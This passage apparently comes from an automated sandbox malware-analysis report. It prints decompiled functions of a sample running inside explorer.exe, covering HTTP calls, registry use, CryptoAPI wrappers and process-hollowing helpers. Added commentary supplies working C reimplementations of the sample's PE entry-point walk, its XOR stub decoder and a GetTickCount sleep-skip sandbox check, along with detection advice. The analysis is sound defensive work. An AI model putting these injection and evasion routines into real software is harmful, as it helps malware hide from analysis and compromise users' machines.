    				_t21 =  *0x7ca260; // 0x7c21a4
    				E007C133C(_t21,  &_v17);
    				_t23 =  *0x7ca260; // 0x7c21a4
    				_t24 = E007C133C(_t23, E007C8A44);
    				_v8 = _v8 ^ 0xc6b7feb7;
    				_v8 = _v8 ^ 0x183cca04;
    				return _t24;
    			}
    Addresses: 0x007c89ee, 0x007c89f4, 0x007c89fa, 0x007c8a07, 0x007c8a10, 0x007c8a16, 0x007c8a23, 0x007c8a29, 0x007c8a31, 0x007c8a38, 0x007c8a42

    APIs
    • GetVolumeInformationA.KERNELBASE(007C21D0,00000000,00000000,?,?,?,00000000,00000000), ref: 007C89F4
    Memory Dump Source
    • Source File: 00000001.00000002.28504861757.007C0000.00000040.sdmp, Offset: 007C0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_7c0000_explorer.jbxd
    Yara matches
    C-Code - Quality: 100%
    			E007C161C(void* __eax, short __ecx, char* __edx, long _a4, long _a8, long _a12, char* _a16, char* _a20) {
    				void* _v8;
    				char* _v12;
    				short _v14;
    				void* _v20;
    				void* _t23;
    
    				_v14 = __ecx;
    				_v12 = __edx;
    				_v8 = __eax;
    				_t23 = InternetConnectA(_v8, _v12, _v14, _a20, _a16, _a12, _a8, _a4); // executed
    				_v20 = _t23;
    				return _v20;
    			}
    Addresses: 0x007c1622, 0x007c1626, 0x007c1629, 0x007c164d, 0x007c1653, 0x007c165c

    APIs
    • InternetConnectA.WININET(?,?,?,?,?,?,?,?), ref: 007C164D
    Memory Dump Source
    • Source File: 00000001.00000002.28504861757.007C0000.00000040.sdmp, Offset: 007C0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_7c0000_explorer.jbxd
    Yara matches
    C-Code - Quality: 100%
    			E007C1660(void* __eax, char* __ecx, char* __edx, long _a4, long _a8, LPCSTR* _a12, char* _a16, char* _a20) {
    				void* _v8;
    				char* _v12;
    				char* _v16;
    				void* _v20;
    				void* _t23;
    
    				_v16 = __ecx;
    				_v12 = __edx;
    				_v8 = __eax;
    				_t23 = HttpOpenRequestA(_v8, _v12, _v16, _a20, _a16, _a12, _a8, _a4); // executed
    				_v20 = _t23;
    				return _v20;
    			}
    Addresses: 0x007c1666, 0x007c1669, 0x007c166c, 0x007c168f, 0x007c1695, 0x007c169e

    APIs
    • HttpOpenRequestA.WININET(?,?,?,?,?,?,?,?), ref: 007C168F
    Memory Dump Source
    • Source File: 00000001.00000002.28504861757.007C0000.00000040.sdmp, Offset: 007C0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_7c0000_explorer.jbxd
    Yara matches
    C-Code - Quality: 100%
    			E007C15E4(void* __eax, long __ecx, char* __edx, long _a4, void* _a8) {
    				void* _v8;
    				char* _v12;
    				long _v16;
    				int _v17;
    				int _t17;
    
    				_v16 = __ecx;
    				_v12 = __edx;
    				_v8 = __eax;
    				_t17 = HttpSendRequestA(_v8, _v12, _v16, _a8, _a4); // executed
    				_v17 = _t17;
    				return _v17;
    			}
    Addresses: 0x007c15ea, 0x007c15ed, 0x007c15f0, 0x007c1607, 0x007c160d, 0x007c1616

    APIs
    • HttpSendRequestA.WININET(?,?,?,?,?), ref: 007C1607
    Memory Dump Source
    • Source File: 00000001.00000002.28504861757.007C0000.00000040.sdmp, Offset: 007C0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_7c0000_explorer.jbxd
    Yara matches
    C-Code - Quality: 100%
    			E007C38B0(void* _a4, char* _a8, int* _a12, int* _a16, char* _a20, int* _a24) {
    				long _v8;
    				long _t15;
    
    				_t15 = RegQueryValueExA(_a4, _a8, _a12, _a16, _a20, _a24); // executed
    				_v8 = _t15;
    				return _v8;
    			}
    Addresses: 0x007c38cc, 0x007c38d2, 0x007c38da

    APIs
    • RegQueryValueExA.KERNELBASE(?,?,?,?,?,?,?,?,007C6992,?,007C1D3C,00000000,00000000,?,?), ref: 007C38CC
    Memory Dump Source
    • Source File: 00000001.00000002.28504861757.007C0000.00000040.sdmp, Offset: 007C0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_7c0000_explorer.jbxd
    Yara matches
    C-Code - Quality: 100%
    			E007C7982() {
    				long _v8;
    				long _v12;
    				CHAR* _t5;
    				int _t6;
    
    				_t5 =  *0x7ca268; // 0x7c21d0
    				_t6 = GetVolumeInformationA(_t5, 0, 0, 0x7cb110,  &_v8,  &_v12, 0, 0); // executed
    				 *0x7cb110 =  *0x7cb110 ^ 0xf1f1f1f1;
    				return _t6;
    			}
    Addresses: 0x007c799f, 0x007c79a5, 0x007c79ab, 0x007c79b8

    APIs
    • GetVolumeInformationA.KERNELBASE(007C21D0,00000000,00000000,007CB110,?,?,00000000,00000000), ref: 007C79A5
    Memory Dump Source
    • Source File: 00000001.00000002.28504861757.007C0000.00000040.sdmp, Offset: 007C0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_7c0000_explorer.jbxd
    Yara matches
    C-Code - Quality: 100%
    			E007C3930(void* _a4, char* _a8, int _a12, int _a16, char* _a20, int _a24) {
    				long _v8;
    				long _t15;
    
    				_t15 = RegSetValueExA(_a4, _a8, _a12, _a16, _a20, _a24); // executed
    				_v8 = _t15;
    				return _v8;
    			}
    Addresses: 0x007c394c, 0x007c3952, 0x007c395a

    APIs
    • RegSetValueExA.KERNELBASE(?,?,?,?,?,?), ref: 007C394C
    Memory Dump Source
    • Source File: 00000001.00000002.28504861757.007C0000.00000040.sdmp, Offset: 007C0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_7c0000_explorer.jbxd
    Yara matches
    C-Code - Quality: 100%
    			E007C7984() {
    				long _v8;
    				long _v12;
    				CHAR* _t5;
    				int _t6;
    
    				_t5 =  *0x7ca268; // 0x7c21d0
    				_t6 = GetVolumeInformationA(_t5, 0, 0, 0x7cb110,  &_v8,  &_v12, 0, 0); // executed
    				 *0x7cb110 =  *0x7cb110 ^ 0xf1f1f1f1;
    				return _t6;
    			}
    Addresses: 0x007c799f, 0x007c79a5, 0x007c79ab, 0x007c79b8

    APIs
    • GetVolumeInformationA.KERNELBASE(007C21D0,00000000,00000000,007CB110,?,?,00000000,00000000), ref: 007C79A5
    Memory Dump Source
    • Source File: 00000001.00000002.28504861757.007C0000.00000040.sdmp, Offset: 007C0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_7c0000_explorer.jbxd
    Yara matches
    C-Code - Quality: 100%
    			E007C3864(char* _a4, long _a8, char* _a12, char* _a16, long _a20) {
    				void* _v8;
    				void* _t13;
    
    				_t13 = InternetOpenA(_a4, _a8, _a12, _a16, _a20); // executed
    				_v8 = _t13;
    				return _v8;
    			}
    Addresses: 0x007c387c, 0x007c3882, 0x007c388a

    APIs
    • InternetOpenA.WININET(?,?,?,?,?), ref: 007C387C
    Memory Dump Source
    • Source File: 00000001.00000002.28504861757.007C0000.00000040.sdmp, Offset: 007C0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_7c0000_explorer.jbxd
    Yara matches
    C-Code - Quality: 100%
    			E007C14F8(DWORD* __eax, long __edx) {
    				DWORD* _v8;
    				long _v12;
    				int _v16;
    				int _t10;
    
    				_v12 = __edx;
    				_v8 = __eax;
    				_t10 = InternetGetConnectedState(_v8, _v12); // executed
    				_v16 = _t10;
    				return _v16;
    			}
    Addresses: 0x007c14fe, 0x007c1501, 0x007c150c, 0x007c1512, 0x007c151b

    APIs
    • InternetGetConnectedState.WININET(?,?), ref: 007C150C
    Memory Dump Source
    • Source File: 00000001.00000002.28504861757.007C0000.00000040.sdmp, Offset: 007C0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_7c0000_explorer.jbxd
    Yara matches
    C-Code - Quality: 100%
    			E007C9080(intOrPtr _a4) {
    				void* _t10;
    				void* _t11;
    
    				_a4 = _a4 + 4;
    				 *0x7cb114 = E007C458C(0);
    				E007C2574(0); // executed
    				E007C8D0C(_t10, _t11, 0, _a4); // executed
    				ExitProcess(0);
    			}
    Addresses: 0x007c9086, 0x007c9091, 0x007c9098, 0x007c90a1, 0x007c90a8

    APIs
      • Part of subcall function 007C8D0C: GetCurrentProcess.KERNEL32 ref: 007C8D33
      • Part of subcall function 007C8D0C: GetCurrentProcess.KERNEL32 ref: 007C8D5D
      • Part of subcall function 007C8D0C: GetCurrentProcess.KERNEL32 ref: 007C8D77
      • Part of subcall function 007C8D0C: LocalAlloc.KERNEL32(00000000,00000014), ref: 007C8D94
      • Part of subcall function 007C8D0C: CreateMutexA.KERNELBASE(?,00000000,007C1CC8), ref: 007C8DB4
      • Part of subcall function 007C8D0C: LocalFree.KERNEL32(?), ref: 007C8DC3
      • Part of subcall function 007C8D0C: RtlInitializeCriticalSection.NTDLL(007CBE04), ref: 007C8E0C
      • Part of subcall function 007C8D0C: Sleep.KERNELBASE(000003E8), ref: 007C8FC8
      • Part of subcall function 007C8D0C: GetCursorPos.USER32(?), ref: 007C9000
      • Part of subcall function 007C8D0C: RtlExitUserThread.NTDLL(00000000), ref: 007C9069
    • ExitProcess.KERNEL32 ref: 007C90A8
    Memory Dump Source
    • Source File: 00000001.00000002.28504861757.007C0000.00000040.sdmp, Offset: 007C0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_7c0000_explorer.jbxd
    Yara matches
    C-Code - Quality: 100%
    			E007C151C(void* __eax) {
    				void* _v8;
    				int _v12;
    				int _t7;
    
    				_v8 = __eax;
    				_t7 = InternetCloseHandle(_v8); // executed
    				_v12 = _t7;
    				return _v12;
    			}
    Addresses: 0x007c1522, 0x007c1529, 0x007c152f, 0x007c1538

    APIs
    • InternetCloseHandle.WININET(?), ref: 007C1529
    Memory Dump Source
    • Source File: 00000001.00000002.28504861757.007C0000.00000040.sdmp, Offset: 007C0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_7c0000_explorer.jbxd
    Yara matches
    C-Code - Quality: 100%
    			E007C13B4(void** __eax, long __edx) {
    				void** _v8;
    				long _v12;
    				void* _t7;
    
    				_v12 = __edx;
    				_v8 = __eax;
    				_t7 = VirtualAlloc(0, _v12, 0x3000, 4); // executed
    				 *_v8 = _t7;
    				return _t7;
    			}
    Addresses: 0x007c13ba, 0x007c13bd, 0x007c13cd, 0x007c13d6, 0x007c13db

    APIs
    • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004), ref: 007C13CD
    Memory Dump Source
    • Source File: 00000001.00000002.28504861757.007C0000.00000040.sdmp, Offset: 007C0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_7c0000_explorer.jbxd
    Yara matches
    C-Code - Quality: 100%
    			E007C1828(void* __eax) {
    				void* _v8;
    				int _t5;
    
    				_v8 = __eax;
    				_t5 = VirtualFree(_v8, 0, 0x8000); // executed
    				return _t5;
    			}
    Addresses: 0x007c182c, 0x007c183a, 0x007c1842

    APIs
    • VirtualFree.KERNELBASE(?,00000000,00008000,?,?,007C6A2F), ref: 007C183A
    Memory Dump Source
    • Source File: 00000001.00000002.28504861757.007C0000.00000040.sdmp, Offset: 007C0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_7c0000_explorer.jbxd
    Yara matches

    Non-executed Functions

    C-Code - Quality: 100%
    			E007C4DE0(void* __eax, void* __eflags) {
    				void* _v8;
    				intOrPtr _v12;
    				long _v16;
    				void _v20;
    				long _v24;
    				void _v28;
    				intOrPtr _v48;
    				void _v52;
    
    				_v8 = __eax;
    				_v12 = 0;
    				E007C1258( &_v52, 0x18);
    				_v16 = NtQueryInformationProcess(_v8, 0,  &_v52, 0x18, 0);
    				if(_v16 == 0 && _v48 != 0) {
    					_v20 = _v48 + 8;
    					ReadProcessMemory(_v8, _v20,  &_v28, 4,  &_v24);
    					_v20 = _v28 + 0x3c;
    					ReadProcessMemory(_v8, _v20,  &_v20, 4,  &_v24);
    					_v20 = _v20 + _v28 + 0x28;
    					ReadProcessMemory(_v8, _v20,  &_v20, 4,  &_v24);
    					_v12 = _v20 + _v28;
    				}
    				return _v12;
    			}
    Addresses: 0x007c4de6, 0x007c4deb, 0x007c4df6, 0x007c4e0f, 0x007c4e16, 0x007c4e24, 0x007c4e39, 0x007c4e45, 0x007c4e5a, 0x007c4e69, 0x007c4e7e, 0x007c4e8a, 0x007c4e8a, 0x007c4e93

    APIs
    • NtQueryInformationProcess.NTDLL(?,00000000,?,00000018,00000000), ref: 007C4E09
    • ReadProcessMemory.KERNEL32(?,?,?,00000004,?), ref: 007C4E39
    • ReadProcessMemory.KERNEL32(?,?,?,00000004,?), ref: 007C4E5A
    • ReadProcessMemory.KERNEL32(?,?,?,00000004,?), ref: 007C4E7E
    Memory Dump Source
    • Source File: 00000001.00000002.28504861757.007C0000.00000040.sdmp, Offset: 007C0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_7c0000_explorer.jbxd
    Yara matches
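E007C4DE0 above resolves a child process's entry point by hand: PebBaseAddress from NtQueryInformationProcess (class 0, PROCESS_BASIC_INFORMATION), ImageBaseAddress at PEB + 8, e_lfanew at image + 0x3c, then AddressOfEntryPoint at e_lfanew + 0x28, one 4-byte ReadProcessMemory per field and no check on any of them. E007C5028 further down this report takes that address as the WriteProcessMemory target after copying a 0x29b-byte stub and running a rolling XOR over it. The C program below is an added example, not code from the sample or from this report: it performs the same header arithmetic over a constructed in-memory image so it runs without Windows, adds the bounds and PE-signature checks the sample omits, and reproduces the XOR key stream as I read it from the decompilation (byte i XORed with the low byte of 0xe4 + i * 0xffffff9b). The image base 0x00400000, the minimal PE header and the 8-byte stub are constructed for the demonstration, not captured from the sample.

```c
#include <stdint.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Read a little-endian DWORD with a bounds check. The sample issues one
 * 4-byte ReadProcessMemory per field and never checks the result. */
static int read_u32(const uint8_t *img, size_t len, uint32_t off, uint32_t *out)
{
    if (off > len || len - off < 4)
        return 0;
    *out = (uint32_t)img[off] | ((uint32_t)img[off + 1] << 8) |
           ((uint32_t)img[off + 2] << 16) | ((uint32_t)img[off + 3] << 24);
    return 1;
}

/* E007C4DE0 minus the remote reads: base+0x3c -> e_lfanew,
 * base+e_lfanew+0x28 -> AddressOfEntryPoint. Returns the RVA, or 0 for a
 * buffer that is truncated or not a PE image (the sample checks neither). */
uint32_t pe_entry_point_rva(const uint8_t *img, size_t len)
{
    uint32_t e_lfanew, sig, ep;
    if (len < 0x40 || img[0] != 'M' || img[1] != 'Z')
        return 0;
    if (!read_u32(img, len, 0x3c, &e_lfanew))
        return 0;
    if (!read_u32(img, len, e_lfanew, &sig) || sig != 0x00004550u) /* "PE\0\0" */
        return 0;
    if (!read_u32(img, len, e_lfanew + 0x28, &ep))
        return 0;
    return ep;
}

/* What E007C4DE0 actually hands back: the virtual address, base + RVA. */
uint32_t pe_entry_point_va(uint32_t image_base, const uint8_t *img, size_t len)
{
    uint32_t rva = pe_entry_point_rva(img, len);
    return rva ? image_base + rva : 0;
}

/* Key stream of the stub decoder in E007C5028 as read from the
 * decompilation: byte i is XORed with the low byte of 0xe4 + i*0xffffff9b,
 * i.e. (0xe4 - 0x65*i) mod 256. This reading is an assumption. */
uint8_t stub_key_byte(uint32_t i)
{
    return (uint8_t)(0xe4u + i * 0xffffff9bu);
}

/* XOR is its own inverse, so one routine both encodes and decodes. */
void stub_xor(uint8_t *buf, size_t n)
{
    for (size_t i = 0; i < n; i++)
        buf[i] ^= stub_key_byte((uint32_t)i);
}

/* Constructed minimal image (not taken from the sample): MZ header with
 * e_lfanew = 0x40, PE signature, AddressOfEntryPoint = 0x1000. */
size_t build_min_pe(uint8_t *out, size_t cap)
{
    if (cap < 0x80)
        return 0;
    memset(out, 0, 0x80);
    out[0] = 'M';
    out[1] = 'Z';
    out[0x3c] = 0x40;                 /* e_lfanew */
    memcpy(out + 0x40, "PE\0\0", 4);  /* Signature */
    out[0x40 + 0x28] = 0x00;          /* AddressOfEntryPoint = 0x1000 */
    out[0x40 + 0x29] = 0x10;
    return 0x80;
}

/* Resolve the entry point of the constructed image at a hypothetical
 * base of 0x00400000, the way the sample would for a suspended child. */
uint32_t demo_entry_point_va(void)
{
    uint8_t img[0x80];
    size_t n = build_min_pe(img, sizeof img);
    return pe_entry_point_va(0x00400000u, img, n);
}

/* Round-trip a constructed 8-byte stub through the XOR; returns 1 on success. */
int demo_stub_roundtrip(void)
{
    uint8_t stub[8] = { 0x55, 0x8B, 0xEC, 0x33, 0xC0, 0x5D, 0xC3, 0x90 };
    uint8_t copy[8];
    memcpy(copy, stub, sizeof stub);
    stub_xor(copy, sizeof copy);               /* encode */
    if (copy[0] != (0x55 ^ 0xe4))
        return 0;
    stub_xor(copy, sizeof copy);               /* decode */
    return memcmp(copy, stub, sizeof stub) == 0;
}

int main(void)
{
    printf("entry point VA: 0x%08x\n", demo_entry_point_va());
    printf("stub round-trip: %s\n", demo_stub_roundtrip() ? "ok" : "FAILED");
    return 0;
}
```

For detection, the sequence itself is the signal: NtQueryInformationProcess(ProcessBasicInformation) on a child created with CREATE_SUSPENDED, followed by 4-byte ReadProcessMemory calls at base+0x3c and base+e_lfanew+0x28, then VirtualProtectEx(PAGE_EXECUTE_READWRITE) and WriteProcessMemory at the address just computed. E007C5028 tries two cheaper routes first (E007C4EF0, then GetThreadContext with CONTEXT_FULL, where Eax of a suspended main thread holds the entry point) and only falls back to this walk when both return 0, so a detection should not depend on the walk being present.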
    C-Code - Quality: 72%
    			E007C6DB0(void* __ecx, void* __fp0) {
    				signed char _v4;
    				intOrPtr _v8;
    				signed int _t9;
    				void* _t19;
    				signed int _t27;
    
    				_t19 = __ecx;
    				asm("sbb dl, [edi+0x421cd09]");
    				_t9 = 0x0000001c |  *0x1c;
    				_t27 = _t9;
    				if(_t27 >= 0) {
    					L4:
    					_t9 = 0x7c;
    				} else {
    					if(_t27 > 0) {
    						asm("fisttp word [edx+0x8f9cbcc]");
    						GetTickCount();
    						goto L4;
    					}
    				}
    				 *((intOrPtr*)(_t19 - 0xb9707bb)) =  *((intOrPtr*)(_t19 - 0xb9707bb)) + _t19;
    				 *_t9 =  *_t9 + _t9;
    				asm("adc eax, 0x7cb4c4");
    				_t11 = GetTickCount() - _v8;
    				asm("sbb eax, eax");
    				_v4 =  ~((GetTickCount() - _v8 & 0xffffff00 | _t11 - 0x000001c2 > 0x00000000) ^ 0x00000001);
    				return _v4;
    			}
    Addresses: 0x007c6db0, 0x007c6db4, 0x007c6dba, 0x007c6dba, 0x007c6dbc, 0x007c6dd1, 0x007c6dd1, 0x007c6dbe, 0x007c6dbe, 0x007c6dc0, 0x007c6dce, 0x00000000, 0x007c6dce, 0x007c6dbe, 0x007c6dd3, 0x007c6dd9, 0x007c6ddd, 0x007c6de8, 0x007c6df7, 0x007c6df9, 0x007c6e02

    APIs
    Memory Dump Source
    • Source File: 00000001.00000002.28504861757.007C0000.00000040.sdmp, Offset: 007C0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_7c0000_explorer.jbxd
    Yara matches
    C-Code - Quality: 72%
    			E007C6DC8(void* __ebx, void* __ecx) {
    				signed char _v8;
    				intOrPtr _v12;
    				void* _t18;
    
    				_t18 = __ecx;
    				GetTickCount();
    				 *((intOrPtr*)(_t18 - 0xb9707bb)) =  *((intOrPtr*)(_t18 - 0xb9707bb)) + _t18;
    				 *0x7c =  *0x7c + 0x7c;
    				asm("adc eax, 0x7cb4c4");
    				_t11 = GetTickCount() - _v12;
    				asm("sbb eax, eax");
    				_v8 =  ~((GetTickCount() - _v12 & 0xffffff00 | _t11 - 0x000001c2 > 0x00000000) ^ 0x00000001);
    				return _v8;
    			}
    Addresses: 0x007c6dc8, 0x007c6dce, 0x007c6dd3, 0x007c6dd9, 0x007c6ddd, 0x007c6de8, 0x007c6df7, 0x007c6df9, 0x007c6e02

    APIs
    Memory Dump Source
    • Source File: 00000001.00000002.28504861757.007C0000.00000040.sdmp, Offset: 007C0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_7c0000_explorer.jbxd
    Yara matches
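E007C6DB0 and E007C6DC8 share their tail addresses (0x007c6dce through 0x007c6e02), so they look like one routine decompiled from two entry points, and most of the body reads like bytes decoded mid-instruction (the sbb/fisttp lines). The tail is readable, though: a GetTickCount call, a second GetTickCount, and the difference compared against 0x1c2 (450 ms). That is the usual sleep-skip probe: if a sandbox fast-forwards Sleep, less wall-clock time passes than was requested. The C program below is an added example, not the sample's code: it keeps the constant and the comparison, substitutes clock_gettime/nanosleep for GetTickCount/Sleep so it runs on a POSIX host, and splits the decision from the timing so the arithmetic can be tested without waiting. Two things are my reading rather than facts the decompilation states: that `_v8`/`_v12` holds the first tick snapshot, and that the routine reports "honoured" when more than 0x1c2 ms elapsed.

```c
#define _POSIX_C_SOURCE 200809L
#include <errno.h>
#include <stdint.h>
#include <stdio.h>
#include <time.h>

#define TICK_THRESHOLD_MS 0x1c2u   /* 450 ms, the constant in E007C6DB0 */

/* GetTickCount stand-in: monotonic milliseconds. GetTickCount is a 32-bit
 * counter with roughly 15.6 ms resolution, so a real sample sees a coarser,
 * wrapping value; the unsigned subtraction below survives the wrap. */
static uint32_t ticks_ms(void)
{
    struct timespec ts;
    clock_gettime(CLOCK_MONOTONIC, &ts);
    return (uint32_t)((uint64_t)ts.tv_sec * 1000u + (uint64_t)ts.tv_nsec / 1000000u);
}

/* The decision on its own: did more than 0x1c2 ms pass between the two
 * snapshots? The polarity is an assumption (see the lead-in). */
int sleep_was_honoured(uint32_t before_ms, uint32_t after_ms)
{
    return (uint32_t)(after_ms - before_ms) > TICK_THRESHOLD_MS;
}

/* Snapshot, sleep for `ms`, snapshot again, decide. nanosleep is restarted
 * on EINTR so a signal cannot shorten the wait and fake a skipped sleep. */
int probe_sleep(unsigned ms)
{
    uint32_t t0 = ticks_ms();
    struct timespec req = { (time_t)(ms / 1000u), (long)(ms % 1000u) * 1000000L };
    while (nanosleep(&req, &req) == -1 && errno == EINTR)
        ;
    return sleep_was_honoured(t0, ticks_ms());
}

int main(void)
{
    printf("500 ms sleep honoured: %s\n", probe_sleep(500) ? "yes" : "no (skipped?)");
    printf("  1 ms sleep honoured: %s\n", probe_sleep(1) ? "yes" : "no");
    return 0;
}
```

The 450 ms threshold is generous enough that tick resolution does not matter, which is why the probe is cheap and reliable against sandboxes that patch Sleep. The rdtsc/cpuid/rdtsc sequence in E007C6B18 further down is the sibling probe at instruction granularity (cpuid forces a VM exit, so the delta balloons under a hypervisor); an analysis environment has to answer both consistently.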
    C-Code - Quality: 100%
    			E007C4E94(void* __eax) {
    				void* _v8;
    				intOrPtr _v12;
    				long _v16;
    				long _v20;
    				void* _v24;
    				void _v28;
    				intOrPtr _v48;
    				void _v52;
    
    				_v8 = __eax;
    				_v16 = NtQueryInformationProcess(_v8, 0,  &_v52, 0x18,  &_v20);
    				if(_v16 == 0 && _v48 != 0) {
    					_v24 = _v48 + 8;
    					ReadProcessMemory(_v8, _v24,  &_v28, 4,  &_v20);
    					_v12 = _v28;
    				}
    				return _v12;
    			}
    Addresses: 0x007c4e9a, 0x007c4eb3, 0x007c4eba, 0x007c4ec8, 0x007c4edd, 0x007c4ee6, 0x007c4ee6, 0x007c4eef

    APIs
    • NtQueryInformationProcess.NTDLL(?,00000000,?,00000018,?), ref: 007C4EAD
    • ReadProcessMemory.KERNEL32(?,?,?,00000004,?), ref: 007C4EDD
    Memory Dump Source
    • Source File: 00000001.00000002.28504861757.007C0000.00000040.sdmp, Offset: 007C0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_7c0000_explorer.jbxd
    Yara matches
    APIs
    • CryptEncrypt.ADVAPI32(?,?,?,?,?,?,?), ref: 007C1AE5
    Memory Dump Source
    • Source File: 00000001.00000002.28504861757.007C0000.00000040.sdmp, Offset: 007C0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_7c0000_explorer.jbxd
    Yara matches
    C-Code - Quality: 100%
    			E007C17A2(long* __eax, int __ecx, long* __edx, DWORD* _a4, BYTE* _a8, int _a12) {
    				long* _v8;
    				long* _v12;
    				int _v16;
    				int _v20;
    
    				_v16 = __ecx;
    				_v12 = __edx;
    				_v8 = __eax;
    				if( *((char*)( *0x7cb460)) != 0xe9) {
    					_v20 = CryptDecrypt(_v8, _v12, _v16, _a12, _a8, _a4);
    				}
    				return _v20;
    			}
    Addresses: 0x007c17aa, 0x007c17ad, 0x007c17b0, 0x007c17bb, 0x007c17db, 0x007c17db, 0x007c17e4

    APIs
    • CryptDecrypt.ADVAPI32(?,?,?,?,?,?), ref: 007C17D5
    Memory Dump Source
    • Source File: 00000001.00000002.28504861757.007C0000.00000040.sdmp, Offset: 007C0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_7c0000_explorer.jbxd
    Yara matches
    C-Code - Quality: 100%
    			E007C17A4(long* __eax, int __ecx, long* __edx, DWORD* _a4, BYTE* _a8, int _a12) {
    				long* _v8;
    				long* _v12;
    				int _v16;
    				int _v20;
    
    				_v16 = __ecx;
    				_v12 = __edx;
    				_v8 = __eax;
    				if( *((char*)( *0x7cb460)) != 0xe9) {
    					_v20 = CryptDecrypt(_v8, _v12, _v16, _a12, _a8, _a4);
    				}
    				return _v20;
    			}
    Addresses: 0x007c17aa, 0x007c17ad, 0x007c17b0, 0x007c17bb, 0x007c17db, 0x007c17db, 0x007c17e4

    APIs
    • CryptDecrypt.ADVAPI32(?,?,?,?,?,?), ref: 007C17D5
    Memory Dump Source
    • Source File: 00000001.00000002.28504861757.007C0000.00000040.sdmp, Offset: 007C0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_7c0000_explorer.jbxd
    Yara matches
    APIs
    • CryptCreateHash.ADVAPI32(?,?,?,?,?), ref: 007C13A1
    Memory Dump Source
    • Source File: 00000001.00000002.28504861757.007C0000.00000040.sdmp, Offset: 007C0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_7c0000_explorer.jbxd
    Yara matches
    APIs
    • CryptGetHashParam.ADVAPI32(?,?,?,?,?), ref: 007C14BD
    Memory Dump Source
    • Source File: 00000001.00000002.28504861757.007C0000.00000040.sdmp, Offset: 007C0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_7c0000_explorer.jbxd
    Yara matches
    APIs
    • CryptHashData.ADVAPI32(?,?,?,?), ref: 007C142D
    Memory Dump Source
    • Source File: 00000001.00000002.28504861757.007C0000.00000040.sdmp, Offset: 007C0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_7c0000_explorer.jbxd
    Yara matches
    APIs
    • CryptSetKeyParam.ADVAPI32(?,?,?,?), ref: 007C159D
    Memory Dump Source
    • Source File: 00000001.00000002.28504861757.007C0000.00000040.sdmp, Offset: 007C0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_7c0000_explorer.jbxd
    Yara matches
    C-Code - Quality: 100%
    			E007C153C(long* __eax, BYTE* __ecx, int __edx) {
    				long* _v8;
    				int _v12;
    				BYTE* _v16;
    				int _v20;
    
    				_v16 = __ecx;
    				_v12 = __edx;
    				_v8 = __eax;
    				if( *((char*)( *0x7cb458)) != 0xe9) {
    					_v20 = CryptGenRandom(_v8, _v12, _v16);
    				}
    				return _v20;
    			}
    Addresses: 0x007c1542, 0x007c1545, 0x007c1548, 0x007c1553, 0x007c1567, 0x007c1567, 0x007c1570

    APIs
    • CryptGenRandom.ADVAPI32(?,?,?), ref: 007C1561
    Memory Dump Source
    • Source File: 00000001.00000002.28504861757.007C0000.00000040.sdmp, Offset: 007C0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_7c0000_explorer.jbxd
    Yara matches
    C-Code - Quality: 100%
    			E007C15B0(void* __eax, long __ecx, void* __edx, DWORD* _a4) {
    				void* _v8;
    				void* _v12;
    				long _v16;
    				int _v20;
    
    				_v16 = __ecx;
    				_v12 = __edx;
    				_v8 = __eax;
    				_v20 = InternetReadFile(_v8, _v12, _v16, _a4);
    				return _v20;
    			}
    Addresses: 0x007c15b6, 0x007c15b9, 0x007c15bc, 0x007c15d5, 0x007c15de

    APIs
    • InternetReadFile.WININET(?,?,?,?), ref: 007C15CF
    Memory Dump Source
    • Source File: 00000001.00000002.28504861757.007C0000.00000040.sdmp, Offset: 007C0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_7c0000_explorer.jbxd
    Yara matches
    C-Code - Quality: 100%
    			E007C1B20(long* __eax, int __edx) {
    				long* _v8;
    				int _v12;
    				int _v16;
    
    				_v12 = __edx;
    				_v8 = __eax;
    				if( *((char*)( *0x7cb50c)) != 0xe9) {
    					_v16 = CryptReleaseContext(_v8, _v12);
    				}
    				return _v16;
    			}
    Addresses: 0x007c1b26, 0x007c1b29, 0x007c1b34, 0x007c1b44, 0x007c1b44, 0x007c1b4d

    APIs
    • CryptReleaseContext.ADVAPI32(?,?), ref: 007C1B3E
    Memory Dump Source
    • Source File: 00000001.00000002.28504861757.007C0000.00000040.sdmp, Offset: 007C0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_7c0000_explorer.jbxd
    Yara matches
    C-Code - Quality: 100%
    			E007C1AF8(long* __eax) {
